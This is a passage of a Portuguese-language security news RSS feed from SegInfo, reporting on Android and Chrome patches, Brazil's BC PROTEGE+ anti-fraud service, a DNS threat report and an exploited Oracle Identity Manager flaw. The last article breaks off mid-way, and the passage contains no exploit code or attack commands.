<figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" width="1024" height="683" src="https://seginfo.com.br/wp-content/uploads/2025/07/AdobeStock_413423897_Editorial_Use_Only-1024x683.jpeg" alt="" class="wp-image-72151" style="aspect-ratio:1.4992888417882142;width:770px;height:auto" srcset="https://seginfo.com.br/wp-content/uploads/2025/07/AdobeStock_413423897_Editorial_Use_Only-1024x683.jpeg 1024w, https://seginfo.com.br/wp-content/uploads/2025/07/AdobeStock_413423897_Editorial_Use_Only-300x200.jpeg 300w, https://seginfo.com.br/wp-content/uploads/2025/07/AdobeStock_413423897_Editorial_Use_Only-150x100.jpeg 150w, https://seginfo.com.br/wp-content/uploads/2025/07/AdobeStock_413423897_Editorial_Use_Only-768x512.jpeg 768w, https://seginfo.com.br/wp-content/uploads/2025/07/AdobeStock_413423897_Editorial_Use_Only-1536x1024.jpeg 1536w, https://seginfo.com.br/wp-content/uploads/2025/07/AdobeStock_413423897_Editorial_Use_Only-2048x1365.jpeg 2048w, https://seginfo.com.br/wp-content/uploads/2025/07/AdobeStock_413423897_Editorial_Use_Only-1170x780.jpeg 1170w, https://seginfo.com.br/wp-content/uploads/2025/07/AdobeStock_413423897_Editorial_Use_Only-720x480.jpeg 720w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
</div>


<p class="wp-block-paragraph">A atualização de segurança de dezembro de 2025 do Android, liberada pelo Google trouxe correções importantes para os usuários do sistema operacional — incluindo duas falhas zero-day que, segundo a empresa, já estavam sendo exploradas em ataques direcionados.</p>



<p class="wp-block-paragraph">As vulnerabilidades, identificadas como <strong>CVE-2025-48633</strong> e <strong>CVE-2025-48572</strong>, afetam o componente <strong>Framework</strong> da plataforma. De acordo com o boletim oficial, uma delas poderia permitir <strong>exposição não autorizada de informações</strong>, enquanto a outra poderia ser explorada para <strong>elevação de privilégios</strong> dentro do sistema.</p>



<p class="wp-block-paragraph">No Android Security Bulletin, o Google afirma:</p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p class="wp-block-paragraph">“Há indícios de que as seguintes vulnerabilidades possam estar sob exploração limitada e direcionada:<br>• <strong><a href="https://www.tenable.com/cve/CVE-2025-48633" target="_blank" rel="noreferrer noopener nofollow">CVE-2025-48633</a></strong><br>• <strong><a href="https://www.tenable.com/cve/CVE-2025-48572" target="_blank" rel="noreferrer noopener nofollow">CVE-2025-48572</a></strong>”</p>
</blockquote>



<p class="wp-block-paragraph">A empresa não divulgou detalhes técnicos adicionais sobre os dois zero-days, mas confirmou que eles impactam as versões <strong>Android 13, 14, 15 e 16</strong>. A falta de informações é comum quando há suspeita de exploração ativa — algo que, segundo analistas, pode indicar o uso das falhas por fornecedores de <em>spyware</em> comercial.</p>



<p class="wp-block-paragraph">A correção dos dois problemas está incluída na primeira parte do pacote mensal, correspondente ao nível de patch <strong>2025-12-01</strong>, que reúne ajustes para <strong>51 vulnerabilidades</strong> nos componentes <strong>Framework</strong> e <strong>System</strong>. Entre elas, destaca-se uma falha crítica no Framework que poderia causar <strong>negação remota de serviço (DoS)</strong> sem necessidade de privilégios adicionais de execução.</p>



<p class="wp-block-paragraph">No total, a atualização de dezembro corrige <strong>107 vulnerabilidades</strong>. A segunda parte do ciclo, marcada como <strong>2025-12-05</strong>, reúne as demais correções e inclui patches para:</p>



<ul class="wp-block-list">
<li>• Kernel do Android</li>



<li>• Componentes de fornecedores como <strong>Arm</strong>, <strong>Imagination Technologies</strong>, <strong>MediaTek</strong>, <strong>Unisoc</strong> e <strong>Qualcomm</strong></li>
</ul>



<p class="wp-block-paragraph">Diferentemente de meses anteriores, <strong>não houve correções</strong> para o <strong>Google Play system update</strong>, e os boletins de segurança do <strong>Android Automotive OS</strong> e <strong>Wear OS</strong> também não receberam patches neste ciclo.</p>



<p class="wp-block-paragraph">Dispositivos que tiverem nível de patch <strong>2025-12-05</strong> ou superior passam a contar com todas as correções incluídas na atualização de dezembro e com os ajustes de segurança acumulados de meses anteriores.</p>
<p>The post <a href="https://seginfo.com.br/2025/12/05/google-corrige-falhas-zero-day-em-atualizacao-de-seguranca-do-android-de-dezembro-de-2025/">Google corrige falhas zero-day em atualização de segurança do Android de dezembro de 2025</a> appeared first on <a href="https://seginfo.com.br">SegInfo - Portal, Podcast e Evento sobre Segurança da Informação</a>.</p>
]]></content:encoded>
					
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">73770</post-id>	<dc:creator>contato@clavis.com.br (Clavis Segurança da Informação)</dc:creator></item>
		<item>
		<title>Chrome 143 corrige vulnerabilidades graves em nova atualização</title>
		<link>https://seginfo.com.br/2025/12/05/chrome-143-corrige-vulnerabilidades-graves-em-nova-atualizacao/</link>
		
		
		<pubDate>Fri, 05 Dec 2025 19:10:19 +0000</pubDate>
				<category><![CDATA[Notícia]]></category>
		<guid isPermaLink="false">https://seginfo.com.br/?p=73766</guid>

					<description><![CDATA[<p>O Google lançou em seu patch tuesday a versão Chrome 143 no canal estável, trazendo correções para 13 vulnerabilidades reportadas por pesquisadores externos. A atualização reforça a segurança do navegador, incluindo falhas classificadas como de alta severidade. Quatro vulnerabilidades graves corrigidas Entre os problemas corrigidos está uma falha de type confusion no mecanismo V8 JavaScript&#8230; <span class="excerpt-more"><a href="https://seginfo.com.br/2025/12/05/chrome-143-corrige-vulnerabilidades-graves-em-nova-atualizacao/">Read More</a></span></p>
<p>The post <a href="https://seginfo.com.br/2025/12/05/chrome-143-corrige-vulnerabilidades-graves-em-nova-atualizacao/">Chrome 143 corrige vulnerabilidades graves em nova atualização</a> appeared first on <a href="https://seginfo.com.br">SegInfo - Portal, Podcast e Evento sobre Segurança da Informação</a>.</p>
]]></description>
										<content:encoded><![CDATA[<div class="wp-block-image">
<figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" width="1024" height="576" src="https://seginfo.com.br/wp-content/uploads/2024/10/capa-seginfo-11.10.24-1024x576.png" alt="" class="wp-image-68411" style="width:742px;height:auto" srcset="https://seginfo.com.br/wp-content/uploads/2024/10/capa-seginfo-11.10.24-1024x576.png 1024w, https://seginfo.com.br/wp-content/uploads/2024/10/capa-seginfo-11.10.24-300x169.png 300w, https://seginfo.com.br/wp-content/uploads/2024/10/capa-seginfo-11.10.24-150x84.png 150w, https://seginfo.com.br/wp-content/uploads/2024/10/capa-seginfo-11.10.24-768x432.png 768w, https://seginfo.com.br/wp-content/uploads/2024/10/capa-seginfo-11.10.24-1536x864.png 1536w, https://seginfo.com.br/wp-content/uploads/2024/10/capa-seginfo-11.10.24-1170x658.png 1170w, https://seginfo.com.br/wp-content/uploads/2024/10/capa-seginfo-11.10.24-1820x1024.png 1820w, https://seginfo.com.br/wp-content/uploads/2024/10/capa-seginfo-11.10.24-853x480.png 853w, https://seginfo.com.br/wp-content/uploads/2024/10/capa-seginfo-11.10.24.png 1920w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
</div>


<p class="wp-block-paragraph">O Google lançou em seu<em> patch tuesday</em> a versão <strong>Chrome 143</strong> no canal estável, trazendo correções para <strong>13 vulnerabilidades</strong> reportadas por pesquisadores externos. A atualização reforça a segurança do navegador, incluindo falhas classificadas como de <strong>alta severidade</strong>.</p>



<h2 class="wp-block-heading" id="h-quatro-vulnerabilidades-graves-corrigidas">Quatro vulnerabilidades graves corrigidas</h2>



<p class="wp-block-paragraph">Entre os problemas corrigidos está uma falha de <strong>type confusion</strong> no mecanismo <strong>V8 JavaScript e WebAssembly</strong>, identificada como <strong>CVE-2025-13630</strong>. O Google recompensou o pesquisador responsável com <strong>US$ 11 mil</strong>.</p>



<p class="wp-block-paragraph">Outras três falhas graves também foram tratadas:</p>



<ul class="wp-block-list">
<li>Implementação inadequada no <strong>Google Updater</strong> (CVE-2025-13631) – recompensa de US$ 3 mil;</li>



<li>Implementação inadequada no <strong>DevTools</strong> (CVE-2025-13632);</li>



<li>Vulnerabilidade de <strong>use-after-free</strong> em <strong>Digital Credentials</strong> (CVE-2025-13633).</li>
</ul>



<h2 class="wp-block-heading" id="h-falhas-de-severidade-media-e-baixa">Falhas de severidade média e baixa</h2>



<p class="wp-block-paragraph">A atualização do Chrome 143 também endereça:</p>



<ul class="wp-block-list">
<li><strong>Três vulnerabilidades de severidade média</strong>:
<ul class="wp-block-list">
<li>Implementação inadequada em <em>Downloads</em>;</li>



<li><em>Bad cast</em> em <em>Loader</em>;</li>



<li><em>Race condition</em> no V8.</li>
</ul>
</li>



<li><strong>Seis vulnerabilidades de baixo impacto</strong>, incluindo falhas de implementação em <em>Downloads</em>, <em>Split View</em>, <em>WebRTC</em> e <em>Passwords</em>, além de um <em>use-after-free</em> em <em>Media Stream</em>.</li>
</ul>



<p class="wp-block-paragraph">Ao todo, o Google afirma ter pago <strong>US$ 18 mil</strong> em recompensas para quatro das vulnerabilidades já divulgadas, enquanto valores referentes a outras seis ainda não foram informados.</p>



<p class="wp-block-paragraph">A empresa não relatou evidências de exploração ativa dessas falhas.</p>



<h2 class="wp-block-heading" id="h-atualizacoes-para-desktop-e-mobile">Atualizações para desktop e mobile</h2>



<p class="wp-block-paragraph">A versão mais recente do navegador já está sendo distribuída:</p>



<ul class="wp-block-list">
<li><strong>Chrome 143.0.7499.40</strong> para Linux;</li>



<li><strong>Chrome 143.0.7499.40/41</strong> para Windows e macOS;</li>



<li><strong>Chrome 143.0.7499.52</strong> para Android;</li>



<li><strong>Chrome 143.0.7499.92</strong> para iOS.</li>
</ul>



<p class="wp-block-paragraph">O Google também atualizou o canal <strong>Extended Stable</strong>, agora na versão <strong>142.0.7499.226</strong> para Windows e macOS.</p>



<h2 class="wp-block-heading" id="h-atualize-o-chrome-o-quanto-antes">Atualize o Chrome o quanto antes</h2>



<p class="wp-block-paragraph">O Google reforça a recomendação para que todos os usuários apliquem as novas atualizações imediatamente. Vulnerabilidades no Chrome costumam ser rapidamente exploradas por agentes mal-intencionados, tornando essencial manter o navegador sempre atualizado.</p>
<p>The post <a href="https://seginfo.com.br/2025/12/05/chrome-143-corrige-vulnerabilidades-graves-em-nova-atualizacao/">Chrome 143 corrige vulnerabilidades graves em nova atualização</a> appeared first on <a href="https://seginfo.com.br">SegInfo - Portal, Podcast e Evento sobre Segurança da Informação</a>.</p>
]]></content:encoded>
					
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">73766</post-id>	<dc:creator>contato@clavis.com.br (Clavis Segurança da Informação)</dc:creator></item>
		<item>
		<title>BC PROTEGE+: a nova camada de segurança do Banco Central</title>
		<link>https://seginfo.com.br/2025/12/03/bc-protege-a-nova-camada-de-seguranca-do-banco-central/</link>
		
		
		<pubDate>Wed, 03 Dec 2025 21:11:34 +0000</pubDate>
				<category><![CDATA[Notícia]]></category>
		<guid isPermaLink="false">https://seginfo.com.br/?p=73735</guid>

					<description><![CDATA[<p>O avanço dos golpes digitais no Brasil, especialmente aqueles ligados à abertura indevida de contas e ao uso fraudulento do Pix, tem pressionado o sistema financeiro a criar mecanismos mais robustos de proteção.&#160; Não é incomum ver casos de quadrilhas abrindo contas falsas no nome de terceiros para movimentar valores ilícitos, golpes envolvendo empréstimos feitos&#8230; <span class="excerpt-more"><a href="https://seginfo.com.br/2025/12/03/bc-protege-a-nova-camada-de-seguranca-do-banco-central/">Read More</a></span></p>
<p>The post <a href="https://seginfo.com.br/2025/12/03/bc-protege-a-nova-camada-de-seguranca-do-banco-central/">BC PROTEGE+: a nova camada de segurança do Banco Central</a> appeared first on <a href="https://seginfo.com.br">SegInfo - Portal, Podcast e Evento sobre Segurança da Informação</a>.</p>
]]></description>
										<content:encoded><![CDATA[<div class="wp-block-image">
<figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" width="1024" height="550" src="https://seginfo.com.br/wp-content/uploads/2025/12/Blog-capa-BC-PROTEGE-a-nova-camada-de-seguranca-do-Banco-Central-1024x550.png" alt="" class="wp-image-73737" style="width:788px;height:auto" srcset="https://seginfo.com.br/wp-content/uploads/2025/12/Blog-capa-BC-PROTEGE-a-nova-camada-de-seguranca-do-Banco-Central-1024x550.png 1024w, https://seginfo.com.br/wp-content/uploads/2025/12/Blog-capa-BC-PROTEGE-a-nova-camada-de-seguranca-do-Banco-Central-300x161.png 300w, https://seginfo.com.br/wp-content/uploads/2025/12/Blog-capa-BC-PROTEGE-a-nova-camada-de-seguranca-do-Banco-Central-150x81.png 150w, https://seginfo.com.br/wp-content/uploads/2025/12/Blog-capa-BC-PROTEGE-a-nova-camada-de-seguranca-do-Banco-Central-768x412.png 768w, https://seginfo.com.br/wp-content/uploads/2025/12/Blog-capa-BC-PROTEGE-a-nova-camada-de-seguranca-do-Banco-Central-894x480.png 894w, https://seginfo.com.br/wp-content/uploads/2025/12/Blog-capa-BC-PROTEGE-a-nova-camada-de-seguranca-do-Banco-Central.png 1043w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
</div>


<p class="wp-block-paragraph">O avanço dos golpes digitais no Brasil, especialmente aqueles ligados à abertura indevida de contas e ao uso fraudulento do Pix, tem pressionado o sistema financeiro a criar mecanismos mais robustos de proteção.&nbsp;</p>



<p class="wp-block-paragraph">Não é incomum ver casos de quadrilhas abrindo contas falsas no nome de terceiros para movimentar valores ilícitos, golpes envolvendo empréstimos feitos sem autorização e até situações em que fraudadores sequestravam identidades digitais completas usando dados vazados na internet.</p>



<p class="wp-block-paragraph">Diante desse cenário, o Banco Central lançou o <strong>BC PROTEGE+</strong>, um recurso gratuito que funciona como uma barreira ativa contra a criação de contas fraudulentas. Ele vale tanto para <strong>pessoas físicas</strong> quanto para <strong>empresas</strong>.</p>



<p class="wp-block-paragraph">A seguir, explicamos como funciona, por que ele é importante e como ativá-lo com segurança.</p>



<h2 class="wp-block-heading" id="h-o-que-e-o-bc-protege"><strong>O que é o BC PROTEGE+?</strong></h2>



<p class="wp-block-paragraph">O BC PROTEGE+ é um serviço oficial do Banco Central que permite comunicar ao sistema financeiro que <strong>você não deseja abrir novas contas</strong>, nem ser incluído como titular ou representante em contas de terceiros.</p>



<p class="wp-block-paragraph">Antes de abrir qualquer conta, bancos e instituições financeiras são obrigados a consultar essa base. Se a proteção estiver ativada, <strong>a instituição é impedida de concluir a abertura</strong> até que você desative manualmente.</p>



<p class="wp-block-paragraph">A medida representa uma camada extra de proteção contra fraudes de identidade, especialmente relevantes no cenário atual, em que criminosos usam:</p>



<ul class="wp-block-list">
<li>• Dados vazados;</li>



<li>• Engenharia social;</li>



<li>• SIM swap;</li>



<li>• Documentos falsificados com auxílio de IA.<br></li>
</ul>



<p class="wp-block-paragraph">Esse mecanismo impede, por exemplo, que golpistas abram contas para movimentar valores de golpes do Pix, um tipo de fraude que teve grande repercussão no país nos últimos anos.</p>



<h2 class="wp-block-heading" id="h-por-que-o-bc-protege-e-importante"><strong>Por que o BC PROTEGE+ é importante?</strong></h2>



<p class="wp-block-paragraph">O BC PROTEGE+ neutraliza um dos caminhos mais usados por criminosos: a abertura silenciosa de contas para capturar Pix, solicitar crédito ou viabilizar movimentações ilícitas sem que o titular legítimo perceba.</p>



<p class="wp-block-paragraph">O serviço é útil para qualquer pessoa ou empresa, mas se torna ainda mais relevante em situações como:</p>



<ul class="wp-block-list">
<li>• Risco de roubo ou extravio de documentos;</li>



<li>• Vazamento de dados pessoais;</li>



<li>• Perda de celular contendo informações sensíveis;</li>



<li>• Tentativas de golpe envolvendo autenticação via SMS ou WhatsApp;</li>



<li>• Casos em que empresas tiveram informações corporativas comprometidas.<br></li>
</ul>



<h2 class="wp-block-heading" id="h-como-ativar-a-protecao"><strong>Como ativar a proteção?</strong></h2>



<p class="wp-block-paragraph">O processo é simples, rápido e gratuito. Basta seguir estas etapas:</p>



<ol class="wp-block-list">
<li>Acesse o <strong>Meu BC</strong> com sua conta <strong>gov.br</strong> (nível Prata ou Ouro), com autenticação em dois fatores.</li>



<li>Dentro do painel, escolha o serviço <strong>BC PROTEGE+</strong>.</li>



<li>Ative a proteção com um único clique.</li>



<li>Se quiser, defina uma data de reativação automática.<br></li>
</ol>



<p class="wp-block-paragraph">Para empresas, colaboradores cadastrados pelo representante legal no gov.br também podem ativar e desativar a proteção da organização.</p>



<p class="wp-block-paragraph">A ativação é imediata e o histórico fica registrado, com possibilidade de consulta ou impressão.</p>



<h2 class="wp-block-heading" id="h-quando-desativar-a-protecao"><strong>Quando desativar a proteção?</strong></h2>



<p class="wp-block-paragraph">O BC PROTEGE+ deve ser desativado apenas quando você quiser abrir uma nova conta bancária, for ser incluído como representante em conta de outra pessoa ou empresa ou precisar atualizar cadastro em uma instituição que exige a revalidação por abertura.</p>



<p class="wp-block-paragraph">Ao desativar, é possível escolher um período máximo de até 30 dias ou um prazo determinado.</p>



<h2 class="wp-block-heading" id="h-um-reforco-necessario-frente-a-evolucao-das-fraudes"><strong>Um reforço necessário frente à evolução das fraudes</strong></h2>



<p class="wp-block-paragraph">A abertura ilícita de contas é um vetor comum em golpes envolvendo Pix. Em muitos casos famosos, criminosos exploraram identidades de terceiros para criar contas “descartáveis”, movimentar valores em minutos e dificultar o rastreio.</p>



<p class="wp-block-paragraph">O BC PROTEGE+ surge justamente para neutralizar esse tipo de ataque e, quando combinado com boas práticas de segurança, como MFA, senhas fortes e monitoramento de vazamento de credenciais, ajuda a reduzir consideravelmente o risco de exposição.</p>



<h2 class="wp-block-heading" id="h-um-passo-importante-para-proteger-sua-identidade-e-seu-negocio"><strong>Um passo importante para proteger sua identidade e seu negócio</strong></h2>



<p class="wp-block-paragraph">Esse recurso marca um avanço significativo na proteção contra fraudes de identidade no Brasil. É simples, acessível, gratuito e funciona tanto para pessoas físicas quanto para empresas.</p>



<p class="wp-block-paragraph">Para quem já atua com cibersegurança, fica claro que o Banco Central está criando mecanismos estruturais para fortalecer o ecossistema financeiro e cabe ao usuário complementar essa proteção com boas práticas digitais.</p>
<p>The post <a href="https://seginfo.com.br/2025/12/03/bc-protege-a-nova-camada-de-seguranca-do-banco-central/">BC PROTEGE+: a nova camada de segurança do Banco Central</a> appeared first on <a href="https://seginfo.com.br">SegInfo - Portal, Podcast e Evento sobre Segurança da Informação</a>.</p>
]]></content:encoded>
					
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">73735</post-id>	<dc:creator>contato@clavis.com.br (Clavis Segurança da Informação)</dc:creator></item>
		<item>
		<title>IA e domínios temporários ampliam alerta para novos modelos de phishing e fraudes online</title>
		<link>https://seginfo.com.br/2025/11/24/ia-e-dominios-temporarios-ampliam-alerta-para-novos-modelos-de-phishing-e-fraudes-online/</link>
		
		
		<pubDate>Mon, 24 Nov 2025 19:08:59 +0000</pubDate>
				<category><![CDATA[Notícia]]></category>
		<guid isPermaLink="false">https://seginfo.com.br/?p=73635</guid>

					<description><![CDATA[<p>Uma nova análise a mais de cem milhões de domínios recém-criados revela uma evolução significativa nas técnicas utilizadas em ciberataques, incluindo tunelização DNS, exfiltração de dados e outros métodos furtivos que desafiam as soluções de segurança tradicionais. O relatório DNS Threat Landscape 2025, divulgado pela Infoblox e distribuído em Portugal pela Exclusive Networks, aponta para&#8230; <span class="excerpt-more"><a href="https://seginfo.com.br/2025/11/24/ia-e-dominios-temporarios-ampliam-alerta-para-novos-modelos-de-phishing-e-fraudes-online/">Read More</a></span></p>
<p>The post <a href="https://seginfo.com.br/2025/11/24/ia-e-dominios-temporarios-ampliam-alerta-para-novos-modelos-de-phishing-e-fraudes-online/">IA e domínios temporários ampliam alerta para novos modelos de phishing e fraudes online</a> appeared first on <a href="https://seginfo.com.br">SegInfo - Portal, Podcast e Evento sobre Segurança da Informação</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="574" src="https://seginfo.com.br/wp-content/uploads/2025/11/AdobeStock_1553045083-1024x574.jpeg" alt="" class="wp-image-73636" srcset="https://seginfo.com.br/wp-content/uploads/2025/11/AdobeStock_1553045083-1024x574.jpeg 1024w, https://seginfo.com.br/wp-content/uploads/2025/11/AdobeStock_1553045083-300x168.jpeg 300w, https://seginfo.com.br/wp-content/uploads/2025/11/AdobeStock_1553045083-150x84.jpeg 150w, https://seginfo.com.br/wp-content/uploads/2025/11/AdobeStock_1553045083-768x430.jpeg 768w, https://seginfo.com.br/wp-content/uploads/2025/11/AdobeStock_1553045083-1536x861.jpeg 1536w, https://seginfo.com.br/wp-content/uploads/2025/11/AdobeStock_1553045083-2048x1148.jpeg 2048w, https://seginfo.com.br/wp-content/uploads/2025/11/AdobeStock_1553045083-1200x673.jpeg 1200w, https://seginfo.com.br/wp-content/uploads/2025/11/AdobeStock_1553045083-1170x656.jpeg 1170w, https://seginfo.com.br/wp-content/uploads/2025/11/AdobeStock_1553045083-1827x1024.jpeg 1827w, https://seginfo.com.br/wp-content/uploads/2025/11/AdobeStock_1553045083-856x480.jpeg 856w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>



<p class="wp-block-paragraph">Uma nova análise a mais de cem milhões de domínios recém-criados revela uma evolução significativa nas técnicas utilizadas em ciberataques, incluindo tunelização DNS, exfiltração de dados e outros métodos furtivos que desafiam as soluções de segurança tradicionais.</p>



<p class="wp-block-paragraph">O relatório <strong><a href="https://www.infoblox.com/resources/report/infoblox-2025-dns-threat-landscape-report/" target="_blank" rel="noreferrer noopener nofollow">DNS Threat Landscape 2025</a></strong>, divulgado pela Infoblox e distribuído em Portugal pela Exclusive Networks, aponta para um avanço expressivo das ameaças impulsionadas por Inteligência Artificial (IA) e para o uso cada vez mais recorrente de plataformas de publicidade online manipuladas para fins maliciosos — um cenário particularmente sensível com a aproximação da Black Friday.</p>



<h3 class="wp-block-heading" id="h-25-dos-novos-dominios-apresentam-comportamentos-suspeitos">25% dos novos domínios apresentam comportamentos suspeitos</h3>



<p class="wp-block-paragraph">De acordo com o estudo, foram observados <strong>mais de 100 milhões de novos domínios</strong> ao longo do último ano. Destes, <strong>um em cada quatro</strong> foi classificado como malicioso ou potencialmente perigoso. A proliferação de domínios descartáveis — criados e eliminados em curtos períodos — tem sido impulsionada por ferramentas baseadas em IA, capazes de gerar padrões variáveis que dificultam a deteção por mecanismos de defesa tradicionais.</p>



<h3 class="wp-block-heading" id="h-adtech-maliciosa-cresce-como-vetor-de-ataque">Adtech maliciosa cresce como vetor de ataque</h3>



<p class="wp-block-paragraph">O levantamento revela também que <strong>82% das empresas monitorizadas</strong> realizaram pedidos DNS que direcionavam para domínios de Adtech maliciosas. Essas plataformas fraudulentas têm sido utilizadas para disseminar conteúdo enganoso, redirecionar utilizadores a páginas de risco e distribuir malware disfarçado de anúncios legítimos.</p>



<p class="wp-block-paragraph">“Os dados deste ano demonstram como os atacantes tiram partido do DNS e das plataformas de publicidade online para mascarar as suas operações. O uso indevido de IA e de sistemas de distribuição de tráfego (TDS) permite-lhes manipular campanhas legítimas e manter infraestruturas ocultas”, afirma <strong>Renée Burton</strong>, diretora da Infoblox Threat Intel.</p>



<h3 class="wp-block-heading" id="h-tecnicas-avancadas-tornam-operacoes-criminosas-mais-dificeis-de-rastrear">Técnicas avançadas tornam operações criminosas mais difíceis de rastrear</h3>



<p class="wp-block-paragraph">O relatório chama a atenção para a crescente sofisticação das campanhas criminosas, que utilizam desde técnicas de tunelização DNS e exfiltração silenciosa de dados até estruturas de comando e controlo associadas a ferramentas conhecidas, como <strong>Cobalt Strike</strong> e <strong>Silver</strong>. A identificação dessas operações depende, cada vez mais, de algoritmos avançados de machine learning.</p>



<p class="wp-block-paragraph">Com a chegada da Black Friday — período em que aumentam campanhas promocionais e o volume de transações online — o risco de <strong>phishing, publicidade enganosa e fraudes baseadas em domínios temporários</strong> tende a crescer significativamente.</p>



<p class="wp-block-paragraph">Para <strong>Elizabeth Alves</strong>, Sales Director da Exclusive Networks Portugal, o momento exige reforço de medidas defensivas:<br>“As empresas portuguesas precisam de soluções mais inteligentes e proativas, que combinem IA com inteligência preditiva para travar ameaças antes de chegarem a clientes ou colaboradores.”</p>



<p class="wp-block-paragraph">Para saber mais, clique <strong><a href="https://www.itsecurity.pt/news/threats/ia-e-dominios-temporarios-elevam-risco-de-phishing-e-fraude-online" target="_blank" rel="noreferrer noopener nofollow">aqui</a></strong>.</p>
<p>The post <a href="https://seginfo.com.br/2025/11/24/ia-e-dominios-temporarios-ampliam-alerta-para-novos-modelos-de-phishing-e-fraudes-online/">IA e domínios temporários ampliam alerta para novos modelos de phishing e fraudes online</a> appeared first on <a href="https://seginfo.com.br">SegInfo - Portal, Podcast e Evento sobre Segurança da Informação</a>.</p>
]]></content:encoded>
					
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">73635</post-id>	<dc:creator>contato@clavis.com.br (Clavis Segurança da Informação)</dc:creator></item>
		<item>
		<title>Vulnerabilidade crítica no Oracle Identity Manager pode ter sido explorada como zero-day</title>
		<link>https://seginfo.com.br/2025/11/21/vulnerabilidade-critica-no-oracle-identity-manager-pode-ter-sido-explorada-como-zero-day/</link>
		
		
		<pubDate>Fri, 21 Nov 2025 17:46:04 +0000</pubDate>
				<category><![CDATA[Notícia]]></category>
		<guid isPermaLink="false">https://seginfo.com.br/?p=73619</guid>

					<description><![CDATA[<p>Uma falha crítica recentemente corrigida no Oracle Identity Manager pode ter sido explorada por cibercriminosos antes da disponibilização do patch, caracterizando um possível ataque zero-day. A vulnerabilidade, identificada como CVE-2025-61757, foi divulgada na última quinta-feira pela empresa de segurança Searchlight Cyber, responsável pela descoberta e pelo reporte à Oracle. Segundo os pesquisadores, trata-se de uma&#8230; <span class="excerpt-more"><a href="https://seginfo.com.br/2025/11/21/vulnerabilidade-critica-no-oracle-identity-manager-pode-ter-sido-explorada-como-zero-day/">Read More</a></span></p>
<p>The post <a href="https://seginfo.com.br/2025/11/21/vulnerabilidade-critica-no-oracle-identity-manager-pode-ter-sido-explorada-como-zero-day/">Vulnerabilidade crítica no Oracle Identity Manager pode ter sido explorada como zero-day</a> appeared first on <a href="https://seginfo.com.br">SegInfo - Portal, Podcast e Evento sobre Segurança da Informação</a>.</p>
]]></description>
										<content:encoded><![CDATA[<div class="wp-block-image">
<figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" width="1024" height="559" src="https://seginfo.com.br/wp-content/uploads/2025/11/AdobeStock_1774733703-1024x559.jpeg" alt="" class="wp-image-73621" style="aspect-ratio:1.8318737860769414;width:756px;height:auto" srcset="https://seginfo.com.br/wp-content/uploads/2025/11/AdobeStock_1774733703-1024x559.jpeg 1024w, https://seginfo.com.br/wp-content/uploads/2025/11/AdobeStock_1774733703-300x164.jpeg 300w, https://seginfo.com.br/wp-content/uploads/2025/11/AdobeStock_1774733703-150x82.jpeg 150w, https://seginfo.com.br/wp-content/uploads/2025/11/AdobeStock_1774733703-768x419.jpeg 768w, https://seginfo.com.br/wp-content/uploads/2025/11/AdobeStock_1774733703-1536x838.jpeg 1536w, https://seginfo.com.br/wp-content/uploads/2025/11/AdobeStock_1774733703-2048x1117.jpeg 2048w, https://seginfo.com.br/wp-content/uploads/2025/11/AdobeStock_1774733703-1170x638.jpeg 1170w, https://seginfo.com.br/wp-content/uploads/2025/11/AdobeStock_1774733703-1877x1024.jpeg 1877w, https://seginfo.com.br/wp-content/uploads/2025/11/AdobeStock_1774733703-880x480.jpeg 880w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
</div>


<p class="wp-block-paragraph">Uma falha crítica recentemente corrigida no <strong>Oracle Identity Manager</strong> pode ter sido explorada por cibercriminosos <strong>antes da disponibilização do patch</strong>, caracterizando um possível ataque <em>zero-day</em>.</p>



<p class="wp-block-paragraph">A vulnerabilidade, identificada como <strong>CVE-2025-61757</strong>, foi divulgada na última quinta-feira pela empresa de segurança <strong>Searchlight Cyber</strong>, responsável pela descoberta e pelo reporte à Oracle. Segundo os pesquisadores, trata-se de uma falha de <strong>execução remota de código (RCE)</strong> pré-autenticação, classificada como crítica.</p>



<h2 class="wp-block-heading" id="h-falha-combina-bypass-de-autenticacao-e-execucao-arbitraria-de-codigo">Falha combina bypass de autenticação e execução arbitrária de código</h2>



<p class="wp-block-paragraph">De acordo com a Searchlight Cyber, o exploit combina duas fraquezas — um bypass de autenticação e a possibilidade de execução arbitrária de código — permitindo que um invasor obtenha <strong>comprometimento total do sistema</strong>.</p>



<p class="wp-block-paragraph">A Oracle confirmou a gravidade da falha e lançou a correção no pacote de atualizações de <strong>outubro de 2025</strong>, reforçando que ela é facilmente explorável <strong>sem necessidade de credenciais</strong>.</p>



<p class="wp-block-paragraph">A empresa de segurança alertou ainda que a exploração pode permitir que atacantes <strong>manipulem fluxos de autenticação, elevem privilégios e realizem movimentos laterais</strong> dentro da infraestrutura da organização, podendo levar à violação de servidores que processam <strong>informações pessoais e credenciais de usuários</strong>.</p>



<h2 class="wp-block-heading" id="h-indicios-de-exploracao-antes-do-patch">Indícios de exploração antes do patch</h2>



<p class="wp-block-paragraph">O <strong>SANS Technology Institute</strong> analisou dados de honeypots após a divulgação técnica feita pela Searchlight e encontrou indícios de exploração.</p>



<p class="wp-block-paragraph">Segundo Johannes Ullrich, diretor do SANS, houve atividades suspeitas entre <strong>30 de agosto e 9 de setembro</strong>, semanas antes da liberação do patch pela Oracle. Ele destacou que:</p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p class="wp-block-paragraph">“Foram observados vários endereços IP diferentes realizando varreduras, mas todos utilizavam o mesmo user-agent, o que sugere a possibilidade de um atacante único.”</p>
</blockquote>



<p class="wp-block-paragraph">Apesar disso, Ullrich observou que os honeypots não registraram o corpo das requisições — todas do tipo <strong>POST</strong> —, o que limita a confirmação completa da exploração.</p>



